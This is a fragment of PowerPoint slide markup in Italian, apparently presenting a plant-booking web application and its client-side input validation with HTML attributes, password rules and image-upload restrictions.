            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{15A2E301-B637-C3A3-FB68-9503AC7AF506}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6604904" y="2366010"/>
            <a:ext cx="3890772" cy="4043988"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3963396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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto contenuto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0AF8E25-2E41-0849-F00F-F3A7FEC6F888}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> dati in input vengono opportunatamente validati affinché siano conformi ai requisiti specifici e sicuri. Ciò include la validazione dei formati, dei tipi di dati, delle lunghezze e altre restrizioni. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>La validazione lato </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>client avviene nel browser del client. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Questa validazione viene eseguita in tempo reale e può fornire feedback immediato all'utente sugli errori di input, migliorando l'esperienza dell'utente. Tuttavia, la validazione lato client può essere aggirata o manipolata da utenti malintenzionati</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>La validazione dei dati lato server, invece, si riferisce alla validazione dei dati che viene eseguita sul server prima di elaborarli o memorizzarli nel database. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3858127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client side</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto contenuto 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0AF8E25-2E41-0849-F00F-F3A7FEC6F888}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Nel caso in esame per effettuare l’input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>validation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> client side è gestito tramite attributi HTML.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 4" descr="Immagine che contiene testo, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD61DA77-D605-ED45-9423-E334AD88CC88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="-1526" t="-1" r="1526" b="15387"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2688316" y="3183593"/>
            <a:ext cx="7122512" cy="3266633"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226291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33D91A-FD3A-8643-C55F-E9D06E13D0EB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>L’APPLICAZIONE WEB</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3113790D-FBC1-F0B7-4ADE-1877D4B427EB}"/>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Le funzionalità messe a disposizione per gli user includono:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Login e registrazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Effettuare una prenotazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Visualizzare le piante e le proprie prenotazioni</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="it-IT" sz="1800" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Segnaposto contenuto 4" descr="Immagine che contiene fiore, testo, pianta, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBD0C9EA-B1AD-D722-ED96-E8B0750E31DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1115568" y="4201297"/>
            <a:ext cx="3909662" cy="2379911"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Immagine 9" descr="Immagine che contiene testo, fiore, pianta, schermata&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3C2ED0-F0A2-0BC7-C265-3A4DCA61258C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7521394" y="2172736"/>
            <a:ext cx="3166202" cy="2502321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Segnaposto contenuto 4" descr="Immagine che contiene testo, schermata, software&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{20C476D6-2463-9B14-5C93-CDDDA12A2A9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7287613" y="4675057"/>
            <a:ext cx="3633764" cy="1913731"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3215813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client side </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a:xfrm>
            <a:off x="1115568" y="2478024"/>
            <a:ext cx="7335661" cy="3694176"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>In particolare sono stati utilizzati:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>pattern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Imposta una </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>regex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> (espressione regolare) che specifica il formato consentito per l'input del campo. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>title</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Fornisce un messaggio di errore da mostrare all'utente se l'input non soddisfa il pattern specificato.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>oninvalid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>setCustomValidity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(…)": </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Specifica una funzione JavaScript da eseguire quando l'input non è valido.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>oninput</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>setCustomValidity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(…)"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Specifica una funzione JavaScript da eseguire quando l'input viene modificato.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750" algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" u="none" strike="noStrike" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>required</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" i="1" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Indica che il campo di input è obbligatorio e deve essere compilato prima di inviare il modulo.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene testo, schermata, Carattere, design&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9A5CEA1-A0A3-9C0B-0E05-3E069A1C6CBB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8550620" y="2743200"/>
            <a:ext cx="3114460" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="147179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client side</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a:xfrm>
            <a:off x="992001" y="2681415"/>
            <a:ext cx="5618864" cy="3274541"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>In particolare, si è resa anche più sicura la scelta delle password da parte di un utente. Sono stati definiti i requisiti che una password deve soddisfare per essere considerata valida. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
              <a:effectLst/>
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Immagine 4" descr="Immagine che contiene testo, schermata, Carattere, design&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{010094EB-CEAB-81F2-3582-E372897D8698}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7771223" y="2202491"/>
            <a:ext cx="3428776" cy="4382382"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Immagine 7" descr="Immagine che contiene schermata, Carattere&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D0CE893-9B16-4A2D-00B1-D5279BCF2AF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="992001" y="4725107"/>
            <a:ext cx="6463982" cy="809355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3837082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client side</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a:xfrm>
            <a:off x="992001" y="2681415"/>
            <a:ext cx="10581832" cy="3274541"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Un ulteriore vali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>dazione effettuata riguarda l’immagine della che deve essere inserita dall’amministratore quando inserisce una nuova pianta, specificando:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Tipo di file accettato: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>L'attributo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>accept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> è impostato su </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>"image/*"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, che indica che vengono accettati tutti i tipi di file immagine. La parte </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>"image/"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> indica che vengono accettati tutti i tipi di file immagine, come ad esempio JPEG, PNG, GIF, ecc. Utilizzando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>accept</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>="image/*"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, il browser mostrerà solo i file con estensioni associate ai formati di immagine comuni quando l'utente seleziona un file tramite il selettore di file.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Dimensione massima del file in input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" b="0" i="0" u="none" strike="noStrike" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Tale validazione è importante per garantire una valida protezione contro l'inserimento di file malevoli.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="it-IT" sz="1600" dirty="0">
              <a:latin typeface="Helvetica" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
